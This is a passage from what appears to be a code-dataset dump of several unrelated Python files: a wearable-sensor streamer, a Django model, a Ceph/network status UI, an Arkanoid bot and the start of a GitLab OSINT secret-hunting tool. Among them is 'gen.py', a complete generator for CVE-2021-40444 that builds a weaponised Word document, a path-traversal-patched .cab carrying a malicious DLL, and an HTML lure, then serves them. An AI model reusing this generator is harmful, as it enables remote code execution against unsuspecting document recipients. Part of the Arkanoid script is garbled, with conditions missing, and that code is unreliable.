not very succesful.\n \n # Start logging\n current_time = str(datetime.datetime.now().timestamp())\n current_time = current_time.replace(\".\", \"_\")\n logfilename = current_time + \".log\"\n \n the_logger = logWriter(logfilename)\n the_logger.log_msg(\"Testing the logger\")\n def signal_handler(signal, frame):\n print( \"caught a signal\")\n global interrupter\n interrupter = True\n \n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n# Connect toe the Empatica BLE Server\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n sock.connect((EMPATICA_ADDRESS, EMPATICA_PORT))\n \n # On windows machine if you dont put that \\r\\n it does not recognize it..\n \n \n # sock.sendall(\"device_list\\r\\n\".encode())\n \n# Specify the correct device ID:\n \n sock.sendall(\"device_connect A219F2\\r\\n\".encode())\n # sock.sendall(\"device_connect 033B64\\r\\n\".encode())\n time.sleep(1)\n \n # Then subscribe to the physiological signals you wish to record:\n \n sock.sendall(\"device_subscribe gsr ON\\r\\n\".encode())\n \n #time.sleep(1)\n #sock.sendall(\"device_subscribe bat ON\\r\\n\".encode())\n \n #time.sleep(1)\n #sock.sendall(\"device_subscribe bvp ON\\r\\n\".encode())\n time.sleep(1)\n# sock.sendall(\"device_subscribe acc ON\\r\\n\".encode())\n #time.sleep(1)\n #sock.sendall(\"device_subscribe tmp ON\\r\\n\".encode())\n \n\n # Connect to Unity/Max whatever for real-time processing of the data:\n client1 = udp_client.SimpleUDPClient(ADDRESS1, PORT1)\n\n \n \n #logWrite = UnicodeWriter(logfilename, dialect=csv.excel, encoding=\"utf-8\")\n #logWrite.writerow(\"Testing the logger\")\n #logfile_handle = open('eggs.csv', 'rb') as c\n\n\n# open('eggs.csv', 'rb') as csvfile\n\n\n\n \n # we are going to make a veyr quick hack for normalizing the EDA\n EDA_max = 1\n EDA_counter = 0\n EDA_BASELINE_LENGTH = 20\n \n# Read data from Empatica:\n interrupter = False\n while interrupter == False:\n \n data = sock.recv(1024).decode()\n\n data = data.replace(\",\", \".\")\n sample_lines = data.split(\"\\n\")\n print(\"the full data: <{0}>\".format(data))\n\n # print(\"Samples are {0},{1}\".format(samples[1], samples[2]))\n\n# If the Empatica server sends more than one line (or more than one sample), parse each sample separately:\n if len(sample_lines) > 1:\n \n # ignore the last \"line\" as it is actually just the carriage return\n # splitlines above separate \\n\\r into two lines...\n for i in range(0, len(sample_lines) - 1):\n # print(\"line numer {0} is: {1}\".format(i, sample_lines[i]))\n samples = sample_lines[i].split(\" \")\n \n # Maybe do some more elegant solution later but if elses it is for now\n if samples[0] == \"E4_Gsr\":\n msg = osc_message_builder.OscMessageBuilder(address = \"/empatica/EDA\")\n EDA_current = float(samples[2])\n print(\"Current EDA: {0}\".format(EDA_current))\n # quick baseline on the first n samples...\n if EDA_counter < EDA_BASELINE_LENGTH:\n EDA_max += EDA_current\n EDA_counter += 1\n continue\n elif EDA_counter == EDA_BASELINE_LENGTH:\n EDA_max = 2 * (EDA_max / EDA_BASELINE_LENGTH)\n EDA_counter += 1\n continue;\n else:\n if EDA_current > EDA_max:\n EDA_max = EDA_current\n \n EDA_normalized = EDA_current / EDA_max\n the_logger.log_msg(\"EDA: \" + str(EDA_current) + \", \" + str(EDA_normalized) + \"\\n\")\n \n print(\"EDA max is {0} and current EDA is {1} and normalized{2}\".format(EDA_max, samples[2], EDA_normalized))\n msg.add_arg(EDA_normalized)\n msg = msg.build()\n client1.send(msg)\n \n if samples[0] == \"E4_Bvp\":\n 
msg = osc_message_builder.OscMessageBuilder(address = \"/empatica/BVP\")\n # print(\"sample is as float {0}\".format(float(samples[1])))\n \n \n daitti = datetime.datetime.fromtimestamp(float(samples[1]))\n # print(\"timestamp is {0}\".format(daitti))\n teh_time = daitti.time();\n \n msg.add_arg(teh_time.__str__());\n msg.add_arg(samples[2])\n msg = msg.build()\n \n the_logger.log_msg(\"BVP: \" + str(samples[2]));\n# client1.send(msg)\n if samples[0] == \"E4_Temp\": \n the_logger.log_msg(\"Temp: \" + str(samples[2]));\n# client1.send(msg) \n if samples[0] == \"E4_Bat\":\n print(\"Battery level: {0} \".format(samples[2]))\n \n if samples[0] == \"E4_Ibi\":\n msg = osc_message_builder.OscMessageBuilder(address = \"/empatica/IBI\")\n daitti = datetime.datetime.fromtimestamp(float(samples[1]))\n\n teh_time = daitti.time();\n # teh_time.\n # msg.add_arg((daitti.second + (daitti.microsecond/1000000)))\n msg.add_arg(teh_time.__str__());\n msg.add_arg(samples[2])\n msg = msg.build()\n the_logger.log_msg(\"IBI: \" + str(samples[2]));\n #client1.send(msg)\n \n if samples[0] == \"E4_Acc\":\n print(\"The raw data is {0}\".format(samples[1]) )\n msg = osc_message_builder.OscMessageBuilder(address = \"/empatica/acc\")\n print(\"sample is as float {0}\".format(float(samples[1])))\n \n daitti = datetime.datetime.fromtimestamp(float(samples[1]))\n print(\"timestamp is {0}\".format(daitti))\n teh_time = daitti.time();\n print(\"The acc values are {0}-{1}-{2}\".format(samples[2], samples[3], samples[4]))\n # teh_time.\n # msg.add_arg((daitti.second + (daitti.microsecond/1000000)))\n# msg.add_arg(teh_time.__str__());\n msg.add_arg(abs(int(samples[2])/200))\n msg.add_arg(abs(int(samples[3])/200))\n msg.add_arg(abs(int(samples[4])/200))\n msg = msg.build()\n the_logger.log_msg(\"ACC: \" + str(samples[2]) + \", \"+ str(samples[3]) + \", \" + str(samples[4]));\n \n client1.send(msg)\n # client1.send_message(\"/empatica/acc\", \"1, 2, 3\")\n the_logger.close_it_all()\n \n\n\n","sub_path":"empatica_EDA_normalizer.py","file_name":"empatica_EDA_normalizer.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14289045","text":"from django.db import models\n\n\nSTEEL_TYPE_CHOICE = (\n ('1080', '1080'),\n ('9310', '9310'),\n ('8645', '8645'),\n ('8620', '8620'),\n ('8617', '8617'),\n ('6150', '6150'),\n ('5160', '5160'),\n ('4620', '4620'),\n ('4140', '4140'),\n ('4130', '4130'),\n ('4118', '4118'),\n ('4047', '4047'),\n)\n\n\nHEAT_TREATMENT_CHOICE = (\n ('austenitizing', 'austenitizing'),\n ('carburizing', 'carburizing'),\n ('normalizing', 'normalizing'),\n ('annealing', 'annealing'),\n ('quencheing', 'quencheing'),\n ('carbonitrieding', 'carbonitrieding'),\n)\n\n\nHEAT_TEMP_CHOICE = (\n ('1050', '1050'),\n ('925', '925'),\n ('885', '885'),\n ('815', '815'),\n ('845', '845'),\n ('900', '900'),\n ('925', '925'),\n ('870', '870'),\n ('880', '880'),\n ('940', '940'),\n ('830', '830'),\n)\n\nHOLDING_TIME_CHOICE = (\n ('30 min', '30 min'),\n ('4 hour', '4 hour'),\n ('2 hour', '2 hour'),\n ('1 hour', '1 hour'),\n ('0 hour', '0 hour'),\n ('11 hour', '11 hour'),\n ('3 hour', '3 hour'),\n ('20 min', '20 min'),\n ('5 min', '5 min'),\n ('8 hour', '8 hour'),\n)\n\nCOOLING_MEDIA_CHOICE = (\n ('furnace', 'furnace'),\n ('oil', 'oil'),\n ('air', 'air'),\n ('water', 'water'),\n)\n\n\n\n\n\nclass Steel(models.Model):\n steel_type = models.CharField(choices=STEEL_TYPE_CHOICE, max_length=50)\n heat_treatment = 
models.CharField(choices=HEAT_TREATMENT_CHOICE, max_length=50)\n heat_temp = models.CharField(choices=HEAT_TEMP_CHOICE, max_length=50)\n holding_time = models.CharField(choices=HOLDING_TIME_CHOICE, max_length=50)\n cooling_media = models.CharField(choices=COOLING_MEDIA_CHOICE, max_length=50)\n image = models.ImageField(upload_to=\"images\")\n notes = models.CharField(max_length=150)","sub_path":"steel_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"452615643","text":"from ui.feature import Feature\nfrom ui.widget_generator import WidgetGenerator\nfrom system_info.network_info import NetworkInfo\nfrom system_info.system_info import SystemInfo\nfrom system_info.hostname_info import HostnameInfo\nfrom ceph.ceph_info import CephInfo\nimport urwid\n\n\nclass SystemStatus(Feature):\n def __init__(self, menu, content, footer):\n super(SystemStatus, self).__init__(menu, content, footer)\n self.menu.add_menu_button('SAFE Status', self.set_content_widget)\n self.wg = WidgetGenerator(self.content.fieldmgr)\n self.system_info = SystemInformation(self.content.fieldmgr)\n self.ceph_status = CephClusterStatus(self.content.fieldmgr)\n self.networking_status = NetworkingStatus(self.content.fieldmgr)\n\n def set_content_widget(self, b):\n self.__display_status()\n\n def __add_widget_to_content(self, widget_list):\n for widget in widget_list:\n self.content.add_widget(widget)\n\n def __display_status(self):\n self.content.clean_content_widget()\n self.__add_widget_to_content(self.system_info.gen_widgets())\n self.content.add_widget(self.wg.gen_blank_line(2))\n self.__add_widget_to_content(self.ceph_status.gen_widgets())\n self.content.add_widget(self.wg.gen_blank_line(2))\n self.__add_widget_to_content(self.networking_status.gen_widgets())\n\n\nclass SystemInformation(object):\n def __init__(self, fieldmgr):\n self.wg = WidgetGenerator(fieldmgr)\n self.info = SystemInfo()\n\n def gen_widgets(self):\n widgets = []\n widgets.append(self.wg.gen_text('System'))\n widgets.append(self.wg.gen_text_uneditable_field('OS version', self.info.get_os_version()))\n widgets.append(self.wg.gen_text_uneditable_field('OS codename', self.info.get_os_codename()))\n widgets.append(self.wg.gen_text_uneditable_field('Kernel version', self.info.get_kernel_version()))\n return widgets\n\n\nclass CephClusterStatus(object):\n def __init__(self, fieldmgr):\n self.wg = WidgetGenerator(fieldmgr)\n self.info = CephInfo()\n self.hostname_info = HostnameInfo()\n\n def gen_widgets(self):\n status = self.info.is_in_cluster(self.hostname_info.get_hostname())\n widgets = []\n hostname = self.hostname_info.get_hostname()\n widgets.append(self.wg.gen_text('Ceph Cluster'))\n if status:\n widgets.append(self.gen_ceph_status_widget())\n else:\n widgets.append(self.wg.gen_text_uneditable_field('Status', 'N/A'))\n if status and hostname in self.info.get_osd_host_list():\n widgets.append(self.wg.gen_blank_line())\n widgets.append(self.gen_osd_list_widget())\n return widgets\n\n def gen_ceph_status_widget(self):\n widgets = []\n widgets.append(self.wg.gen_text_uneditable_field('Status', 'on'))\n widgets.append(self.wg.gen_text_uneditable_field('Ceph version', self.info.get_version()))\n widgets.append(self.wg.gen_text_uneditable_field('Cluster fsid', self.info.get_fsid()))\n widgets.append(self.wg.gen_text_uneditable_field('Cluster health', self.info.get_health()))\n return urwid.Pile(widgets)\n\n def 
gen_osd_list_widget(self):\n widgets = []\n widgets.append(self.wg.gen_text('OSD List'))\n for osd in self.info.get_local_osd_list():\n status = 'on' if self.info.is_running_osd(osd) else 'off'\n journal_uuid = self.info.get_uuid_of_journal(osd)\n journal_device = self.info.get_device(journal_uuid)\n osd_uuid = self.info.get_uuid_of_osd(osd)\n osd_device = self.info.get_device(osd_uuid)\n osd_info = osd + ' ( %s / Journal %s )' % (osd_device, journal_device)\n widgets.append(self.wg.gen_text_uneditable_field(osd_info, status))\n return urwid.Pile(widgets)\n\n\nclass NetworkingStatus(object):\n def __init__(self, fieldmgr):\n self.info = NetworkInfo()\n self.wg = WidgetGenerator(fieldmgr)\n\n def get_interfaces_info(self):\n return self.info.get_interfaces_info(\n self.info.get_ethernet_device_names()\n )\n\n def gen_widgets(self):\n widgets = []\n self.interfaces = self.get_interfaces_info()\n widgets.append(self.wg.gen_text('Networking Status'))\n widgets.append(self.gen_interface_info_widget())\n for interface in self.interfaces:\n widgets.append(self.gen_interface_info_widget(interface))\n return widgets\n\n def gen_interface_info_widget(self, interfaceinfo=None):\n '''Generate the format widget for interface Information\n\n Args:\n interfaceinfo type's interface information\n Returns:\n The column widget of the infos\n '''\n if interfaceinfo is None:\n widgets = [\n ('fixed', 2, urwid.Text(('label', ' '))),\n ('weight', 2, urwid.Text('Device')),\n ('weight', 3, urwid.Text('Mac Address')),\n ('weight', 3, urwid.Text('IP Address')),\n ('weight', 2, urwid.Text('Status')),\n ('weight', 3, urwid.Text('Connecting Check'))\n ]\n else:\n status, test_button = self.gen_network_check_button(interfaceinfo)\n widgets = [\n ('fixed', 2, urwid.Text(('label', '* '))),\n ('weight', 2, urwid.Text(interfaceinfo.get_name())),\n ('weight', 3, urwid.Text(interfaceinfo.get_mac_address())),\n ('weight', 3, urwid.Text(interfaceinfo.get_ip_address())),\n ('weight', 2, status),\n ('weight', 3, test_button)\n ]\n widget = urwid.Columns(widgets)\n widget._iterable = True\n return self.wg.set_fixed_columns(widget)\n\n def gen_network_check_button(self, interfaceinfo):\n status = urwid.Text('N/A')\n test_button = urwid.Padding(urwid.Button('Test'), width=8)\n return status, test_button\n","sub_path":"features/SystemStatus.py","file_name":"SystemStatus.py","file_ext":"py","file_size_in_byte":5998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"105166624","text":"#!/usr/bin/python3\n\n# CVE-2021-40444\n\n# Library\nimport argparse,zipfile,shutil,os,string,random,glob\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\n\n# Colors Settings\nclass colors:\n PURPLE = '\\033[95m'\n BLUE = '\\033[94m'\n CYAN = '\\033[92m'\n GREEN = '\\033[92m'\n RED = '\\033[91m'\n RESET = '\\033[0m'\n WHITEBOLD = '\\033[1m'\n ORANGE = '\\033[1;33;40m'\ncg = colors.GREEN\ncr = colors.RESET\n# Header\ndef header():\n\tprint('''\n _______ ________ ___ ___ ___ __ _ _ ___ _ _ _ _ _ _\n / ____\\ \\ / / ____| |__ \\ / _ \\__ \\/_ | | || | / _ \\| || | | || | | || |\n | | \\ \\ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| || |_| || |_\n | | \\ \\/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|__ _|__ _|\n | |____ \\ / | |____ / /_| |_| / /_ | | | | | |_| | | | | | | |\n \\_____| \\/ |______| |____|\\___/____||_| |_| \\___/ |_| |_| |_|\n\n By H0j3n''')\n\n\tprint(cg+\"\\n[+] \"+cr+\"Example : \\n-> python3 gen.py -d document/Sample.docx -p payload/payload.dll 
-i \\\"http://10.10.10.10\\\" -t html/poc.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3\")\n\n# Function Uncompress Document\ndef uncompress_document(files,folder_name,file_name):\n\tcheck_header = False\n\tcheck_document = False\n\tcheck_footer = False\n\tbasepath = 'output/'+folder_name\n\t# Unzip\n\twith zipfile.ZipFile(files, 'r') as zip_ref:\n\t zip_ref.extractall(basepath+\"/decompress\")\n\tdecompress_path = basepath+\"/decompress\"\n\t# Check .rels file \n\tlist_xml = [ decompress_path+\"/word/\"+i.split(\"/\")[-1][:-5] for i in glob.glob(decompress_path+'/word/_rels/*.rels')]\n\tlist_rels = glob.glob(decompress_path+'/word/_rels/*.rels')\n\t# Beautify (.xml.res) files\n\tfor i in list_rels:\n\t\ttemp = open(i).read()\n\t\ttemp = BeautifulSoup(temp, \"xml\").prettify()\n\t\twith open(i, 'w') as out:\n\t\t\tout.write(temp)\n\t\tout.close()\n\t# Beautify (.xml) files\n\tfor i in list_xml:\n\t\ttemp = open(i).read()\n\t\ttemp = BeautifulSoup(temp, \"xml\").prettify()\n\t\twith open(i,'w') as out:\n\t\t\tout.write(temp)\n\t\tout.close()\n\treturn list_xml,list_rels\n\n# Function Check Oleobject\ndef check_oleobject(list_rels,list_xml):\n\tlist_oleobject = []\n\tfor i in list_rels:\n\t\twith open(i) as reads:\n\t\t\tfor k in reads:\n\t\t\t\tif \"oleobject\" in k.strip().lower():\n\t\t\t\t\tlist_oleobject.append(i)\n\t\t\t\t\treads.close()\n\t\t\t\t\tbreak\n\t\treads.close()\n\ttemp = []\n\tfor k in list_xml:\n\t\tfor j in list_oleobject:\n\t\t\tif k.split(\"/\")[-1] in j:\n\t\t\t\ttemp.append(k)\n\treturn list_oleobject,temp\n\n# Function Modified Document\ndef modified_document(oleobject,mode_obfuscate,host,xml):\n\tout = \"\"\n\twith open(oleobject) as reads:\n\t\tfor i in reads:\n\t\t\tif \"oleobject\" in i.strip().lower():\n\t\t\t\tdata = obfuscator('mhtml:'+host+'!x-usc:'+host,mode_obfuscate)\n\t\t\t\trid = i.strip().split(\"\\\"\")[1]\n\t\t\t\ttemp = ''''''\n\t\t\t\tout += temp\n\t\t\telse:\n\t\t\t\tout+= i.strip()\n\treads.close()\n\tout = out.replace(\"{PAYLOAD_HERE}\",data)\n\tout = BeautifulSoup(out, \"xml\").prettify()\n\twith open(oleobject, 'w') as f:\n\t\tf.write(out)\n\t# Convert to UTF-16BE (.xml.res)\n\tif (mode_obfuscate == \"2\") or (mode_obfuscate == \"3\"):\n\t\tpath_backup = '/'.join(oleobject.split(\"/\")[:-1])+\"/\"\n\t\tos.system(\"cat \"+oleobject+\" | sed 's/utf-8/UTF-16BE/g' | sed 's/UTF8-8/UTF-16BE/g' | iconv -f UTF-8 -t UTF-16BE > \"+path_backup+\"backup\")\n\t\tos.system(\"mv \"+path_backup+\"backup \"+oleobject)\n\t# Edit (.xml)\n\tout = \"\"\n\twith open(xml) as reads:\n\t\tfor i in reads:\n\t\t\tif \"oleobject\" in i.strip().lower():\n\t\t\t\ttemp = i.strip().replace(\"Embed\",\"Link\")[:-2] + ' UpdateMode=\"OnCall\" />'\n\t\t\t\tout += temp\n\t\t\telse:\n\t\t\t\tout += i.strip()\n\treads.close()\n\ttemp = BeautifulSoup(out, \"xml\").prettify()\n\twith open(xml, 'w') as out:\n\t\tout.write(temp)\n\n# Function Obfuscator\ndef obfuscator(payload,checker):\n\t# Convert to HTML Entity\n\tif (checker == \"1\") or (checker == \"3\"):\n\t\ttemp = encode_htmlentity(payload)\n\t\tpayload = temp\n\treturn payload\n\n# Function Encode HTML Entity\ndef encode_htmlentity(payload):\n\tchecklist = [\".\",\":\",\"!\",\"/\"]\n\ttemp = \"\"\n\tfor i in payload:\n\t\tif i not in checklist:\n\t\t\ttemp += (\"&#\"+str(ord(i))+\";\")\n\t\telse:\n\t\t\ttemp += i\n\treturn temp\n\n# Function compressed document\ndef compressed_document(files,checker,folder_name):\n\t# Chcker if rename is pass \n\tif checker == \"None\":\n\t\tdocname = 
files.split(\"/\")[1]\n\telse:\n\t\tdocname = checker\n\n\t# Zip the folder and files\n\tshutil.make_archive('output/'+folder_name+\"/web/\"+docname, 'zip', 'output/'+folder_name+'/decompress')\n\tos.rename('output/'+folder_name+\"/web/\"+docname+'.zip','output/'+folder_name+\"/web/\"+docname)\n\treturn docname\n# Function Path cab\ndef patch_cab(cab_dir,inf):\n\tm_off = 0x2d\n\tf = open(cab_dir,'rb')\n\tcab_data = f.read()\n\tf.close()\n\n\tout_cab_data = cab_data[:m_off]\n\tout_cab_data += b'\\x00\\x5c\\x41\\x00'\n\tout_cab_data += cab_data[m_off+4:]\n\n\tout_cab_data = out_cab_data.replace(b'..\\\\'+inf.encode(), b'../'+inf.encode())\n\n\tf = open(cab_dir,'wb')\n\tf.write(out_cab_data)\n\tf.close()\n\n# Function write html\ndef write_html(host,files,inf,html,html_dir):\n\ttemp = open(html).read().replace(\"{HOST_CHANGE}\",host+'/'+files).replace(\"{INF_CHANGE}\",inf)\n\twith open(html_dir, 'w') as out:\n\t\tout.write(temp)\n\n# Main\nif __name__ == '__main__':\n\t# Header\n\theader()\n\t# Argument Options\n\tparser = argparse.ArgumentParser(description='A tool to generate document for CVE-2021-40444')\n\tparser.add_argument('-d','--document', help='Get the docoument',required=True)\n\tparser.add_argument('-i','--ip', help='Get Host',required=True)\n\tparser.add_argument('-p','--payload', help='Get the malicious dll',required=True)\n\tparser.add_argument('-t','--html', help='Get the html to be use',required=True)\n\tparser.add_argument('-r','--rename',help='Rename the document file (output)',default=\"None\")\n\tparser.add_argument('-c','--cab',help='Rename the cab file (Make sure to put .cab)',default=\"None\")\n\tparser.add_argument('-f','--inf',help='Rename the inf file (Make sure to put .inf)',default=\"msword.inf\")\n\tparser.add_argument('-obf','--obfuscate',help='Comes with 3 Mode : 1 (HTML Entity), 2 (UTF-16BE), 3 (Both 1 & 2)')\n\tparser.add_argument('-v','--verbose',help='Increase output verbosity',action=\"store_true\")\n\targs = parser.parse_args()\n\n\t# Get time,file name,file extension, folder name\n\tnow = datetime.now()\n\tfile_name = ''.join(''.join(args.document.split(\".\")[:-1]).split(\"/\")[1:])\n\tfile_ext = args.document.split(\".\")[-1]\n\tfolder_name = file_name+\"_\"+file_ext+\"_\"+now.strftime(\"%Y\")+now.strftime(\"%m\")+now.strftime(\"%d\")+\"_\"+now.strftime(\"%H%M%S\")\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Folder\")\n\t\tprint(\"-> output/\"+folder_name)\n\t# Create New Output Folder & Web\n\tos.system(\"mkdir output/\"+folder_name)\n\tos.system(\"mkdir output/\"+folder_name+\"/web/\")\n\n\t# (1) Uncompress Document\n\tlist_xml,list_rels = uncompress_document(args.document,folder_name,file_name)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Uncompress Document\")\n\t\tprint(\"-> List of .rels\")\n\t\tfor i in list_rels:\n\t\t\tprint(\" * \"+i)\n\t\tprint(\"-> List of .xml\")\n\t\tfor i in list_xml:\n\t\t\tprint(\" * \"+i)\n\n\t# (2) Check files with oleobject\n\tlist_oleobject,list_xml = check_oleobject(list_rels,list_xml)\n\tif len(list_oleobject) == 0:\n\t\tprint(\"\\n[-] No OleObject found ! Please check your document again.\")\n\t\texit(-1)\n\telif len(list_oleobject) > 1:\n\t\tprint(\"\\n[-] Found 2 OleObject ! 
Please ensure that you put either header, document or footer.\")\n\t\texit(-1)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Found OleObject\")\n\t\tprint(\"-> List of .rels\")\n\t\tprint(\" * \"+list_oleobject[0])\n\t\tprint(\"-> List of .xml\")\n\t\tprint(\" * \"+list_xml[0])\n\n\t# (3) Modified Document\n\tmodified_document(list_oleobject[0],args.obfuscate,args.ip,list_xml[0])\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Document done modified\")\n\t# (4) Compressed Document\n\targs.rename = compressed_document(args.document,args.rename,folder_name)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Document done compressed\")\n\t\tprint(\"-> \"+'output/'+folder_name+\"/web/\"+args.rename)\n # (5) Convert .dll to .cab\n\tif args.cab == \"None\":\n\t cabname = \"payload.cab\"\n\telse:\n\t cabname = args.cab\n\t# 1. Copy .dll -> .inf \n\t# 2. Make directory gen\n\t# 3. Lcab convert .inf -> .cab\n\t# 4. Create web directory\n\t# 5. Move .cab to web directory\n\tos.system(\"cp \"+args.payload+\" payload/\"+args.inf+\" ; mkdir payload/gen/ ; cd payload/gen/ ; lcab '../\"+args.inf+\"' ../\"+cabname+\" >/dev/null;\")\n\tos.system(\"rm -rf payload/gen;\")\n\tos.system(\"rm payload/\"+args.inf)\n\tos.system(\"mv payload/\"+cabname+\" output/\"+folder_name+\"/web/\")\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\".dll convert to .cab\")\n\t\tprint(\"->\"+\" output/\"+folder_name+\"/web/\"+cabname)\n\n\t# (6) Patch .cab\n\tcab_dir = \"output/\"+folder_name+\"/web/\"+cabname\n\tpatch_cab(cab_dir,args.inf)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\".cab patched\")\n\t# (7) Write index.html\n\thtml_dir = \"output/\"+folder_name+\"/web/index.html\"\n\twrite_html(args.ip,cabname,args.inf,args.html,html_dir)\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Done write index.html\")\n\t\tprint(\"-> \"+html_dir)\n\n\t# (8) Host Server with instructions\n\tos.chdir(\"output/\"+folder_name+\"/web/\")\n\tif args.verbose:\n\t\tprint(cg+\"\\n[+] \"+cr+\"Completed every steps\")\n\t\tprint(\"-> List of files needed\")\n\t\tprint(\" * \"+cab_dir)\n\t\tprint(\" * \"+html_dir)\n\t\tprint(\" * \"+'output/'+folder_name+\"/web/\"+args.rename)\n\tos.system(\"echo ;python3 -m http.server 80\")\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":9514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462801643","text":"\"\"\"\r\nThe template of the main script of the machine learning process\r\n\"\"\"\r\n\r\nimport games.arkanoid.communication as comm\r\nfrom games.arkanoid.communication import ( \\\r\n SceneInfo, GameStatus, PlatformAction\r\n)\r\n\r\ndef ml_loop():\r\n \"\"\"\r\n The main loop of the machine learning process\r\n\r\n This loop is run in a separate process, and communicates with the game process.\r\n\r\n Note that the game process won't wait for the ml process to generate the\r\n GameInstruction. It is possible that the frame of the GameInstruction\r\n is behind of the current frame in the game process. Try to decrease the fps\r\n to avoid this situation.\r\n \"\"\"\r\n\r\n # === Here is the execution order of the loop === #\r\n # 1. Put the initialization code here.\r\n ball_served = False\r\n pre_Ball_x=95\r\n pre_Ball_y=400\r\n m=0\r\n # 2. Inform the game process that ml process is ready before start the loop.\r\n comm.ml_ready()\r\n\r\n # 3. Start an endless loop.\r\n while True:\r\n # 3.1. 
Receive the scene information sent from the game process.\r\n scene_info = comm.get_scene_info()\r\n\r\n # 3.2. If the game is over or passed, the game process will reset\r\n # the scene and wait for ml process doing resetting job.\r\n if scene_info.status == GameStatus.GAME_OVER or \\\r\n scene_info.status == GameStatus.GAME_PASS:\r\n # Do some stuff if needed\r\n ball_served = False\r\n pre_Ball_x=scene_info.ball[0]\r\n pre_ball_y=scene_info.ball[1]\r\n print(pre_Ball_x,pre_Ball_y)\r\n # 3.2.1. Inform the game process that ml process is ready\r\n comm.ml_ready()\r\n continue\r\n\r\n # 3.3. Put the code here to handle the scene information\r\n \r\n ball_x=scene_info.ball[0]\r\n ball_y=scene_info.ball[1]\r\n platform_x=scene_info.platform[0]\r\n Vx=ball_x-pre_Ball_x\r\n Vy=ball_y-pre_Ball_y\r\n \r\n # 3.4. Send the instruction for this frame to the game process\r\n if not ball_served:\r\n #comm.send_instruction(scene_info.frame, PlatformAction.MOVE_LEFT)\r\n #comm.send_instruction(scene_info.frame, PlatformAction.MOVE_LEFT)\r\n comm.send_instruction(scene_info.frame, PlatformAction.SERVE_TO_RIGHT)\r\n ball_served = True\r\n if Vy>0:\r\n newp=down(ball_x,ball_y,Vx,scene_info)\r\n if platform_x+10>newp:\r\n comm.send_instruction(scene_info.frame, PlatformAction.MOVE_LEFT)\r\n elif platform_x+30newp:\r\n comm.send_instruction(scene_info.frame, PlatformAction.MOVE_LEFT)\r\n elif platform_x+30400:\r\n break\r\n if Vx>=0:\r\n x+=7\r\n y+=7\r\n if x>=193:\r\n x=400-x\r\n Vx=-Vx\r\n continue\r\n for br in scene_info.bricks:\r\n if x>br[0] and xbr[1]-5:\r\n if y-7br[0] and xbr[1]-5:\r\n if y-70:\r\n x+=7\r\n y-=7\r\n if x>=193:\r\n x=400-x\r\n Vx=-Vx\r\n continue\r\n for br in scene_info.bricks:\r\n if x>br[0] and xbr[1]-5:\r\n if y+7>br[1]+10: #hit bitton\r\n return down(x,y,Vx,scene_info)\r\n else:\r\n Vx=-Vx\r\n break\r\n else:\r\n x-=7\r\n y-=7\r\n if x<=0:\r\n x=-x\r\n Vx=-Vx\r\n continue\r\n for br in scene_info.bricks:\r\n if x>br[0] and xbr[1]-5:\r\n if y+7>br[1]+10:\r\n return down(x,y,Vx,scene_info)\r\n else:\r\n Vx=-Vx\r\n break\r\n return x \r\n","sub_path":"ml_play.py","file_name":"ml_play.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81681026","text":"import argparse\nimport json\nimport os\nimport re\nimport sys\nfrom collections import namedtuple\n\nfrom utilities import constants\n\n\nclass Arguments:\n class __Arguments:\n def __init__(self):\n parser = argparse.ArgumentParser(\n description=\"Collect OSINT for GitLab groups and, optionally, members. Search repository assets for \"\n \"sensitive data.\")\n required_args = parser.add_mutually_exclusive_group(required=True)\n required_args.add_argument('-g', '--group', type=str, action='append',\n help=\"ID or HTML encoded name of a GitLab group. This option, by itself, \"\n \"will display group projects only.\")\n required_args.add_argument('-p', '--project', type=str, action='append',\n help=\"ID or HTML encoded name of a GitLab project. This option, by itself, \"\n \"will display project details only.\")\n parser.add_argument('-u', '--url', default='https://gitlab.com',\n help=\"An optional argument to specify the base URL of your GitLab instance. 
If the \"\n \"argument is not supplied, its defaulted to 'https://gitlab.com'\")\n parser.add_argument('-m', '--members', action='store_true',\n help=\"Include group members and their personal projects and their related assets in the \"\n \"search for sensitive data.\")\n parser.add_argument('-s', '--snippets', action='store_true',\n help=\"Searches found projects for GitLab Snippets with sensitive data.\")\n parser.add_argument('-i', '--issues', action='store_true',\n help=\"Searches found projects for GitLab Issues and discussions/comments with sensitive \"\n \"data.\")\n parser.add_argument('-r', '--mergerequests', action='store_true',\n help=\"Searches found projects for GitLab Merge Requests and discussions/comments with \"\n \"sensitive data.\")\n parser.add_argument('-j', '--jobs', action='store_true',\n help=\"Searches each projects' public CI job logs for sensitive data starting with the \"\n \"most recent jobs that either succeeded or failed\")\n parser.add_argument('-d', '--depth', type=int,\n help=\"Limit the number of requests across ALL targeted assets including group projects\")\n parser.add_argument('-t', '--timestamp', action='store_true',\n help='Disables display of start/finish times and originating IP to the output')\n parser.add_argument('-x', '--proxy', type=str, action='store',\n help='Proxies all requests using the provided URI matching the scheme: '\n 'http(s)://user:pass@10.10.10.10:8000')\n parser.add_argument('-c', '--cert', type=str, action='store',\n help='Used in tandem with -p (--proxy), this switch provides a fully qualified path to a '\n 